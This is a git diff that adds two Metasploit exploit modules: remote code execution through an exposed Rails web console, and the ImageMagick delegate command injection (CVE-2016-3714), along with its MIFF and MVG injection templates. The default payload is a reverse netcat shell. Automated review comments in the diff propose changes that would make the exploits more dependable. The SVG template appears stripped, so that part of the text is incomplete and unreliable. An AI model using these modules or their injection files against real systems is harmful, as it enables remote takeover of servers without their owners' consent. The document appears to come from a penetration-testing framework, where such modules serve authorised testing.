diff --git a/data/exploits/CVE-2016-3714/msf.miff b/data/exploits/CVE-2016-3714/msf.miff
new file mode 100644
index 0000000000..faef4019ff
--- /dev/null
+++ b/data/exploits/CVE-2016-3714/msf.miff
@@ -0,0 +1,14 @@
+id=ImageMagick version=1.0
+class=DirectClass colors=0 matte=False
+columns=1 rows=1 depth=16
+colorspace=sRGB
+page=1x1+0+0
+rendering-intent=Perceptual
+gamma=0.454545
+red-primary=0.64,0.33 green-primary=0.3,0.6 blue-primary=0.15,0.06
+white-point=0.3127,0.329
+date:create=2016-05-04T00:19:42-05:00
+date:modify=2016-05-04T00:19:42-05:00
+label={";echo vulnerable"}
+
+:ÿÿÿÿÿÿ
diff --git a/data/exploits/CVE-2016-3714/msf.mvg b/data/exploits/CVE-2016-3714/msf.mvg
new file mode 100644
index 0000000000..f53afc7afc
--- /dev/null
+++ b/data/exploits/CVE-2016-3714/msf.mvg
@@ -0,0 +1,8 @@
+push graphic-context
+encoding "UTF-8"
+viewbox 0 0 1 1
+affine 1 0 0 1 0 0
+push graphic-context
+image Over 0,0 1,1 'https://localhost";echo vulnerable"'
+pop graphic-context
+pop graphic-context
diff --git a/data/exploits/CVE-2016-3714/msf.svg b/data/exploits/CVE-2016-3714/msf.svg
new file mode 100644
index 0000000000..2b3181763c
--- /dev/null
+++ b/data/exploits/CVE-2016-3714/msf.svg
@@ -0,0 +1,5 @@
+ + + +
diff --git a/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb b/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
new file mode 100644
index 0000000000..ead6381ad8
--- /dev/null
+++ b/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb
@@ -0,0 +1,92 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Ruby on Rails Development Web Console (v2) Code Execution',
+ 'Description' => %q{
+ This module exploits a remote code execution feature of the Ruby on Rails
+ framework. This feature is exposed if the config.web_console.whitelisted_ips
+ setting includes untrusted IP ranges and the web-console gem is enabled.
+ },
+ 'Author' => ['hdm'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'https://github.com/rails/web-console' ]
+ ],
+ 'Platform' => 'ruby',
+ 'Arch' => ARCH_RUBY,
+ 'Privileged' => false,
+ 'Targets' => [ ['Automatic', {} ] ],
+ 'DefaultOptions' => { "PrependFork" => true },
+ 'DisclosureDate' => 'May 2 2016',
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ Opt::RPORT(3000),
+ OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/missing404"])
+ ], self.class)
+
+ end
+
+ #
+ # Identify the web console path and session ID, then inject code with it
+ #
+ def exploit
+
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path),
+ 'method' => 'GET'
+ }, 25)
+
+ if !
res
+ print_error("Error: No response requesting #{datastore['TARGETURI']}")
+ return
+ end
+
+ if res.body.to_s !~ /data-mount-point='([^']+)'/
+ if res.body.to_s.index("Application Trace") && res.body.to_s.index("Toggle session dump")
+ print_error("Error: The web console is either disabled or you are not in the whitelisted scope")
+ else
+ print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
+ end
+ return
+ end
+
+ console_path = $1 + "/repl_sessions"
+
+ if res.body.to_s !~ /data-session-id='([^']+)'/
+ print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
+ return
+ end
+
+ session_id = $1
+
+ print_status("Sending payload to #{console_path}/#{session_id}")
+ res = send_request_cgi({
+ 'uri' => console_path + "/" + session_id,
+ 'method' => 'PUT',
+ 'headers' => {
+ 'Accept' => 'application/vnd.web-console.v2',
+ 'X-Requested-With' => 'XMLHttpRequest'
+ },
+ 'vars_post' => {
+ 'input' => payload.encoded
+ }
+
+ }, 25)
+
+ handler
+ end
+end
diff --git a/modules/exploits/unix/fileformat/imagemagick_delegate.rb b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
new file mode 100644
index 0000000000..1ff74bc034
--- /dev/null
+++ b/modules/exploits/unix/fileformat/imagemagick_delegate.rb
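Review bot: The PUT that delivers the payload to `#{console_path}/#{session_id}` assigns its response to `res` but never inspects it before `handler` runs, so a stale session id, a whitelist rejection, or a missing web-console route (a 4xx/5xx or no response at all) is indistinguishable from a successful injection and the module simply waits out the handler. Add a check immediately after that request: `unless res && res.code == 200` / `print_error("Unexpected response #{res ? res.code : 'none'} from #{console_path}/#{session_id}")` / `return`. The earlier detection failures already carry good reasons; if this framework version supports it, `fail_with(Failure::NotVulnerable, ...)` there instead of `print_error` + `return` would make those outcomes machine-readable rather than a silent return.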
@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'ImageMagick Delegate Arbitrary Command Execution',
+ 'Description' => %q{
+ This module exploits a shell command injection in the way "delegates"
+ (commands for converting files) are processed in ImageMagick versions
+ <= 7.0.1-0 and <= 6.9.3-9 (legacy).
+
+ Since ImageMagick uses file magic to detect file format, you can create
+ a .png (for example) which is actually a crafted SVG (for example) that
+ triggers the command injection.
+
+ Tested on Linux, BSD, and OS X. You'll want to choose your payload
+ carefully due to portability concerns. Use cmd/unix/generic if need be.
+ },
+ 'Author' => [
+ 'stewie', # Vulnerability discovery
+ 'Nikolay Ermishkin', # Vulnerability discovery
+ 'wvu', # Metasploit module
+ 'hdm' # Metasploit module
+ ],
+ 'References' => [
+ %w{CVE 2016-3714},
+ %w{URL https://imagetragick.com/},
+ %w{URL http://seclists.org/oss-sec/2016/q2/205},
+ %w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
+ %w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
+ ],
+ 'DisclosureDate' => 'May 3 2016',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Privileged' => false,
+ 'Payload' => {
+ 'BadChars' => "\x22\x27\x5c", # ", ', and \
+ 'Compat' => {
+ 'PayloadType' => 'cmd cmd_bash',
+ 'RequiredCmd' => 'generic netcat bash-tcp'
+ }
+ },
+ 'Targets' => [
+ ['SVG file', template: 'msf.svg'], # convert msf.png msf.svg
+ ['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg
+ ['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/unix/reverse_netcat',
+ 'LHOST' =>
Rex::Socket.source_address,
+ 'DisablePayloadHandler' => false,
+ 'WfsDelay' => 9001
+ }
+ ))
+
+ register_options([
+ OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
+ ])
+ end
+
+ def exploit
+ if target.name == 'SVG file'
+ p = Rex::Text.html_encode(payload.encoded)
+ else
+ p = payload.encoded
+ end
+
+ file_create(template.sub('echo vulnerable', p))
+ end
+
+ def template
+ File.read(File.join(
+ Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
+ ))
+ end
+
+end
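Review bot: `template` reads the data file with a plain `File.read`, so the string is tagged with the process's default external encoding (normally UTF-8), yet the MIFF template added in this commit ends in raw 0xff pixel bytes that are not valid UTF-8; depending on `Encoding.default_external`/`default_internal` the later `sub` may raise an invalid-byte-sequence error or the bytes may be transcoded before `file_create` writes them. Reading in binary mode, `File.binread(File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]))`, makes all three targets behave the same. A smaller defensive point in `exploit`: `sub` with a String replacement interprets `\0`, `\1`, `\&` and friends inside `p`, which is only safe today because `\` is a BadChar; the block form `template.sub('echo vulnerable') { p }` removes that coupling, and `fail_with(Failure::BadConfig, 'template lacks marker') unless template.include?('echo vulnerable')` would catch a data file that silently drops the placeholder instead of emitting a benign image.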